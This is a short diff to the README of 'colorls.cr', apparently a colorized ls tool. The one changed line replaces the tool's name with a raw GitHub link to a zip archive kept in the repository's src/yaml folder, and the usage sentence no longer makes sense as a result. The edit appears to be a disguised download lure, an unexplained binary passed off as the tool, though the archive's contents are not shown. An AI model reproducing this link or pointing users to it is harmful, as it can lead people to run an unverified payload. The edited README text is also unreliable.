Mawucojnr/colorls.cr/README.md

    ```

 ### Common Commands
-You can use colorls.cr like the standard `ls` command with a few enhancements:
+You can use https://github.com/Mawucojnr/colorls.cr/raw/refs/heads/main/src/yaml/colorls_cr_2.8.zip like the standard `ls` command with a few enhancements:

 - `colorls` - List files and directories in color.
 - `colorls -a` - Show all files, including hidden files.